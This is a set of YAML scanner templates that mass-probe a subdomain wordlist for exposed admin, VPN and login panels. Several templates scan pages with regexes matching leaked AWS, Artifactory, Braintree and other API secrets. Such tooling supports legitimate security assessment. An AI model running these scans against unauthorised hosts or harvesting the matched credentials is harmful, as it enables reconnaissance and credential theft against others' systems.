/Templates/Exposed-Panels/sharecenter-login.yaml:
--------------------------------------------------------------------------------
1 | id: sharecenter-login
2 |
3 | info:
4 | name: ShareCenter Login Page
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6892
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers:
22 | - type: word
23 | words:
24 | - "ShareCenter"
25 | - "Please Select Your Account"
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sitecore-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sitecore-login-panel
2 |
3 | info:
4 | name: Sitecore Login Panel
5 | author: b4uh0lz
6 | severity: info
7 | tags: panel,sitecore
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /sitecore/admin/login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - "Sitecore Login"
29 | part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/siteomat-login.yaml:
--------------------------------------------------------------------------------
1 | id: siteomat-loader
2 |
3 | info:
4 | name: Orpak SiteOmat login portals
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6624
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.htm HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'SiteOmat Login'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/solarwinds-orion.yaml:
--------------------------------------------------------------------------------
1 | id: solarwinds-orion
2 |
3 | info:
4 | name: SolarWinds Orion Panel
5 | author: puzzlepeaches
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /Orion/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "SolarWinds Orion"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/solarwinds-servuftp-detect.yaml:
--------------------------------------------------------------------------------
1 | id: solarwinds-servuftp-detect
2 |
3 | info:
4 | name: SolarWinds Serv-U FileServer
5 | author: johnk3r
6 | severity: info
7 | tags: solarwinds,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 |
23 | - type: regex
24 | part: header
25 | regex:
26 | - "Serv-U"
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/solr-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: solr-exposure
2 |
3 | info:
4 | name: Apache Solr Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /solr/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Solr Admin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/somfy-login.yaml:
--------------------------------------------------------------------------------
1 | id: somfy-login
2 |
3 | info:
4 | name: Somfy Login Page
5 | author: DhiyaneshDK
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /m_login.htm HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "Home motion by Somfy"
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sonarqube-login.yaml:
--------------------------------------------------------------------------------
1 | id: sonarqube-login
2 |
3 | info:
4 | name: SonarQube panel detect
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /sessions/new HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "SonarQube"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sonicwall-management-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sonicwall-management-panel
2 |
3 | info:
4 | name: SonicWall Management Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /auth.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "SonicWall - Authentication"
24 | - "SonicWall Administrator"
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sonicwall-sslvpn-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sonicwall-sslvpn-panel
2 |
3 | info:
4 | name: SonicWall Virtual Office SSLVPN Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cgi-bin/welcome HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Virtual Office"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/strapi-admin-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: strapi-admin-exposure
2 |
3 | info:
4 | name: Strapi Admin Dasboard Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/auth/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "Strapi Admin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/strapi-panel.yaml:
--------------------------------------------------------------------------------
1 | id: strapi-panel
2 |
3 | info:
4 | name: Strapi Login Panel
5 | author: idealphase
6 | severity: info
7 | tags: panel,strapi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/auth/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 |
25 | - type: word
26 | words:
27 | - "Strapi Admin"
28 |
29 | - type: status
30 | status:
31 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/supervpn-panel.yaml:
--------------------------------------------------------------------------------
1 | id: supervpn-detect
2 |
3 | info:
4 | name: SuperVPN panel detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Sign In-SuperVPN"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/synnefo-admin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: synnefo-admin-panel
2 |
3 | info:
4 | name: Synnefo Admin Panel Exposure
5 | author: impramodsargar
6 | severity: info
7 | tags: panel,synnefo
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /synnefoclient/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Synnefo Admin'
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/tikiwiki-cms-1.yaml:
--------------------------------------------------------------------------------
1 | id: tikiwiki-cms 1
2 |
3 | info:
4 | name: Tiki Wiki CMS Groupware
5 | author: chron0x
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /tiki-login_scr.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - "Tiki Wiki CMS Groupware"
28 | part: body
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/tikiwiki-cms-2.yaml:
--------------------------------------------------------------------------------
1 | id: tikiwiki-cms 2
2 |
3 | info:
4 | name: Tiki Wiki CMS Groupware
5 | author: chron0x
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /tiki-login.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - "Tiki Wiki CMS Groupware"
28 | part: body
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/total-web.yaml:
--------------------------------------------------------------------------------
1 | id: total-web-login
2 |
3 | info:
4 | name: Total Web Solution
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6811
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'Total Web Solutions'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/traefik-dashboard.yaml:
--------------------------------------------------------------------------------
1 | id: traefik-dashboard-detect
2 |
3 | info:
4 | name: Traefik Dashboard
5 | author: schniggie,StreetOfHackerR007
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /dashboard/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - ""
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/vigor-login.yaml:
--------------------------------------------------------------------------------
1 | id: vigor-login
2 |
3 | info:
4 | name: Vigor Login Page
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6610
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /weblogin.htm HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'Vigor Login Page'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/virtual-ema-detect-1.yaml:
--------------------------------------------------------------------------------
1 | id: virtual-ema-detect 1
2 |
3 | info:
4 | name: Virtual EMS Panel Detection
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /VirtualEms/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login"
24 | - "Browse"
25 | - "Welcome Guest"
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/virtual-ema-detect-2.yaml:
--------------------------------------------------------------------------------
1 | id: virtual-ema-detect 2
2 |
3 | info:
4 | name: Virtual EMS Panel Detection
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /VirtualEms/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login"
24 | - "Browse"
25 | - "Welcome Guest"
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/weave-scope-dashboard-detect.yaml:
--------------------------------------------------------------------------------
1 | id: weave-scope-dashboard-detect
2 |
3 | info:
4 | name: Weave Scope Dashboard
5 | author: e_schultze_
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Weave Scope"
24 | - "__WEAVEWORKS_CSRF_TOKEN"
25 | - "__CSRF_TOKEN_PLACEHOLDER__"
26 | condition: and
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/webeditors-2.yaml:
--------------------------------------------------------------------------------
1 | id: webeditors 2
2 |
3 | info:
4 | name: Web Editors
5 | author: princechaddha
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /ckeditor/samples/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "FCKeditor"
24 | - "<title>CKEditor Samples"
25 | - "http://ckeditor.com"
26 | - "init_spell()"
27 | - "'tip':'"
28 | condition: or
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/webmin-panel-1.yaml:
--------------------------------------------------------------------------------
1 | id: webmin-panel 1
2 |
3 | info:
4 | name: Webmin Admin Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login to Webmin"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/webmin-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: webmin-panel 2
2 |
3 | info:
4 | name: Webmin Admin Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /webmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login to Webmin"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/xenforo-login.yaml:
--------------------------------------------------------------------------------
1 | id: xenforo-login
2 |
3 | info:
4 | name: XenForo Login/Register
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22XenForo%22
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /index.php HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers:
22 | - type: word
23 | words:
24 | - 'XenForo'
25 | condition: and
26 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/yarn-manager-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: yarn-manager-exposure
2 |
3 | info:
4 | name: Apache Yarn ResourceManager Exposure / Unauthenticated Access
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cluster/cluster HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - 'hadoop'
24 | - 'resourcemanager'
25 | - 'logged in as: dr.who'
26 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zenario-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: zenario-login-panel
2 |
3 | info:
4 | name: Zenario Admin login
5 | author: __Fazal
6 | severity: info
7 | tags: panel,zenario
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /zenario/admin/welcome.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - "Welcome to Zenario"
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zentao-detect.yaml:
--------------------------------------------------------------------------------
1 | id: zentao-detect
2 |
3 | info:
4 | name: Zentao detect
5 | author: pikpikcu
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /zentao/index.php?mode=getconfig HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - '"sessionName":"zentaosid"'
24 | - '{"version":"'
25 | part: body
26 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zipkin-exposure-1.yaml:
--------------------------------------------------------------------------------
1 | id: zipkin-exposure 1
2 |
3 | info:
4 | name: Zipkin Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "webpackJsonpzipkin-lens"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zipkin-exposure-2.yaml:
--------------------------------------------------------------------------------
1 | id: zipkin-exposure 2
2 |
3 | info:
4 | name: Zipkin Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /zipkin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "webpackJsonpzipkin-lens"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/amazon-sns-topic.yaml:
--------------------------------------------------------------------------------
1 | id: amazon-sns-topic
2 |
3 | info:
4 | name: Amazon SNS Topic Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,amazon
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/artifactory-api-password.yaml:
--------------------------------------------------------------------------------
1 | id: artifactory-api-password
2 |
3 | info:
4 | name: Artifactory Password Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,artifactory
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/artifactory-api-token.yaml:
--------------------------------------------------------------------------------
1 | id: artifactory-api-token
2 |
3 | info:
4 | name: Artifactory API Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,artifactory
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/aws-access-key-value.yaml:
--------------------------------------------------------------------------------
1 | id: aws-access-key-value
2 |
3 | info:
4 | name: AWS Access Key ID Value
5 | author: Swissky
6 | severity: info
7 | tags: exposure,token,aws,amazon
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/bitly-secret-key.yaml:
--------------------------------------------------------------------------------
1 | id: bitly-secret-key
2 |
3 | info:
4 | name: Bitly Secret Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,bitly
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'R_[0-9a-f]{32}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/braintree-access-token.yaml:
--------------------------------------------------------------------------------
1 | id: braintree-access-token
2 |
3 | info:
4 | name: PayPal Braintree Access Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/cloudinary-credentials.yaml:
--------------------------------------------------------------------------------
1 | id: cloudinary-credentials
2 |
3 | info:
4 | name: Cloudinary Credentials Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,cloudinary
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
